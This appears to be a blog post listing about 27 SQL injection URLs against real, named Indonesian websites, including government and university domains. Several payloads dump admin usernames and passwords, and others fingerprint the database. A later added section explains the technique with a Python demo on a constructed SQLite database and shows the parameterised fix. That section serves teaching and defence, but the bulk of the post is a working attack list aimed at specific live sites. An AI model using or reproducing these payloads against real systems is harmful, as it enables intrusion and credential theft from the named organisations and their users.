Indonesian Vuln Sites [ part three ]

http://www.rs-internasionalbintaro.com/profil.php?id=-3%20union%20select%201,2,3,4,5,group_concat(column_name),7,8,9,10,11,12,13,14,15,16,17,18,19%20from%20information_schema.columns%20where%20table_name=0x61646d696e--

http://www.ff.unair.ac.id/detail.profil.php?id=-130801629%20union%20select%201,2,3,4,5,group_concat(login,0x3a,pass),7,8,9%20from%20login--

http://binusbasketball.com/newsdetail.php?id=-8+union+select+concat_ws(0x3a,user,pass),2,3+from+tab_user--

http://www.export-jatim.or.id/profil.php?id=-467%20union%20select%201,version(),user(),database(),5,6,7,8,9,01,11,12,13,14,15,16,17,18,19,20,21,22,23,24--

http://www.surabayaflorist.com/tampildetail-prod.php?id=-289%20union%20select%201,2,3,4,group_concat(nama,0x3a,password),6,7,8%20from%20anggota--

http://www.alsofwah.or.id/index.php?pilih=lihatakhbar&id=-861%20union%20select%201,2,group_concat(user,0x3a,email,0x3a,password),4,5,6,7,8%20from%20user--

http://www.ecom.depkominfo.go.id/index.php?id=-178%20union%20select%201,group_concat(uname,0x3a,passwd),3,4%20from%20admin_users--

http://120.136.18.83/e-learning/article.php?id=-154%20union%20select%201,2,3,4,5,6,7,8,9,version(),11--

http://dinaskukm.jakarta.go.id/info.php?id=-5%20union%20select%201,2,3,4,5,group_concat(nama,0x3a,passw),7,8,9,10,11%20from%20ukmlogin/*

http://iib.diknas.go.id/info.php?id=-1%20union%20select%201,user(),database(),4,version(),6,7--

http://www.biocert.or.id/infoguide-info.php?id=-191%20union%20select%201,2,3,4,5,6,group_concat(username,0x3a,password),8,9,10%20from%20tb_user--

http://www.amarijogja.com/info/info.php?id=-8%20union%20select%201,database(),user(),version(),5--

http://www.terranet.or.id/conf.php?id=-1%20union%20select%201,2,group_concat(logname,0x3a,kunci),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%20from%20operator--

http://www.amirsyam.com/photos.php?id=-2%20union%20select%201,2,3,4,5,group_concat(User_Name,0x3a,Password),7,8%20from%20tblUser--

http://islamicvillage.net/stit/library/lib.php?id=-6%20union%20select%201,group_concat(USERNAME,0x3a,PASSWORD),3%20from%20tbl_user--

http://stikom.edu/v8/main.php?act=inf&goto=agd&id=-253%20union%20select%201,2,3,version(),5,6--

http://digilib.stikom.edu/id/detil.php?id=-221%20union%20select%201,2,3,4,5,6,7,8,version(),database(),11,user(),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34--

http://digilib.its.ac.id/detil.php?id=-2745%20union%20select%201,2,3,4,5,6,7,8,version(),database(),user(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34--

http://www.banten.go.id/index.php?link=brt_dtl&id=-1112%20union%20select%201,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--

http://dpu.magelangkab.go.id/content.php?id=4%20union%20select%201,2,3,4,group_concat(username,0x3a,password),6,7,8,9,10,11%20from%20admins--

http://www.sokagallery.com/content.php?id=-64%20union%20select%201,2,group_concat(wu_username,0x3a,wu_password),4,5,6,7,8,9%20from%20web_user--

http://www.ppatk.go.id/content.php?s_sid=-58%20union%20select%201,2,3--

http://www.mcd.co.id/web/content.php?id=-21%20union%20select%201,2,3,version(),5,6,7,8--

http://pla.deptan.go.id/content.php?id=-2%20union%20select%201,2,version(),4,5,6--

http://www.kotekaonline.com/english/preview.php?id=-50%20union%20select%201,2,version(),4,user(),6,7,8--

http://www.belitungtimur.com/beltim1/format_news.php?id_news=-96%20union%20select%201,2,3,4,version(),6,7,8,user(),database(),11,12--

http://www.indonesiameetup.org/replytopost.php?id_post=-202%20union%20select%201,version()--
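Every URL above is the same bug: an `id` parameter dropped straight into a `WHERE id=...` clause. The payloads follow one recipe: a negative id so the real row disappears, a `union select` whose column list (those long `1,2,3,...,34` runs) was grown until it matched the original query, `group_concat(col,0x3a,col)` to fold a whole credential table into one cell (0x3a is a hex-encoded ':'; the `table_name=0x61646d696e` above is just 'admin' in hex), `version()`/`user()`/`database()` for fingerprinting, and `--` or `/*` to eat the rest of the query. The following is an added example, not code from this post or from any site listed: it rebuilds that pattern against a constructed SQLite schema, finds the column count the way those lists were found, pulls the credentials, and then shows the parameterised lookup that stops it. Table and column names (`profil`, `admin`, `username`, `password`) and the hashes are invented for the demo; SQLite has no `0x3a` string literal, so the payload uses `':'` and `||` instead.

```python
import sqlite3

# Constructed sample schema (assumption for this example, not from any site on
# the page): a "profil" table looked up by id and an "admin" table with logins.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE profil (id INTEGER, title TEXT, body TEXT);
        INSERT INTO profil VALUES (3, 'About us', 'Company profile');
        CREATE TABLE admin (username TEXT, password TEXT);
        INSERT INTO admin VALUES ('admin',  '5f4dcc3b5aa765d61d8327deb882cf99');
        INSERT INTO admin VALUES ('editor', 'e10adc3949ba59abbe56e057f20f883e');
    """)
    return db


def vulnerable_lookup(db, id_param):
    # Same pattern as the profil.php?id= endpoints above: the raw query-string
    # value is concatenated into the SQL text, so it can become SQL syntax.
    sql = "SELECT id, title, body FROM profil WHERE id=" + id_param
    return db.execute(sql).fetchall()


def safe_lookup(db, id_param):
    # Hardened form: validate the type, then bind the value as a parameter.
    # The driver sends it as data, never as part of the statement.
    if not id_param.lstrip("-").isdigit():
        raise ValueError("id must be an integer")
    sql = "SELECT id, title, body FROM profil WHERE id=?"
    return db.execute(sql, (int(id_param),)).fetchall()


def find_column_count(db, max_cols=40):
    # How the "1,2,3,...,N" lists on the page are produced: keep adding columns
    # to the UNION until the database stops rejecting the count mismatch.
    for n in range(1, max_cols + 1):
        cols = ",".join(str(i) for i in range(1, n + 1))
        probe = "-3 union select " + cols + "--"
        try:
            vulnerable_lookup(db, probe)
            return n
        except sqlite3.OperationalError:
            continue
    return None


# The page's payload adapted to SQLite: negative id empties the legitimate
# result, three columns match the original SELECT, group_concat folds every
# admin row into one cell, and "--" comments out whatever follows.
# (MySQL form: -3 union select 1,group_concat(username,0x3a,password),3 from admin--)
PAYLOAD = "-3 union select 1, group_concat(username || ':' || password), 3 from admin--"


def dump_via_injection(db):
    # Returns the injected group_concat cell, e.g. "admin:5f4d...,editor:e10a..."
    rows = vulnerable_lookup(db, PAYLOAD)
    return rows[0][1]


def injection_blocked(db):
    # The same payload against the parameterised lookup never reaches SQL.
    try:
        safe_lookup(db, PAYLOAD)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print("columns in original query:", find_column_count(db))
    print("dumped via injection:", dump_via_injection(db))
    print("safe lookup blocks payload:", injection_blocked(db))
```

The `find_column_count` probe is the bit worth internalising: every one of the `1,2,3,...` runs above is the attacker counting columns by error message, so an application that leaks database errors to the browser is handing that step over for free. The fix is not input filtering of `union` or `--`; it is the `?` placeholder in `safe_lookup`, which keeps data and statement separate regardless of what the value contains.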


Comments

Anonymous said…
Nice one, bro.
evilc0de said…
I am pretty cool, dude.. lolz
So how do we deal with this? Is there any suggestion/trick so that we are not vulnerable anymore?? Thank you for finding the hole in our network.
labatterie said…
Thank you for finding the hole in our network.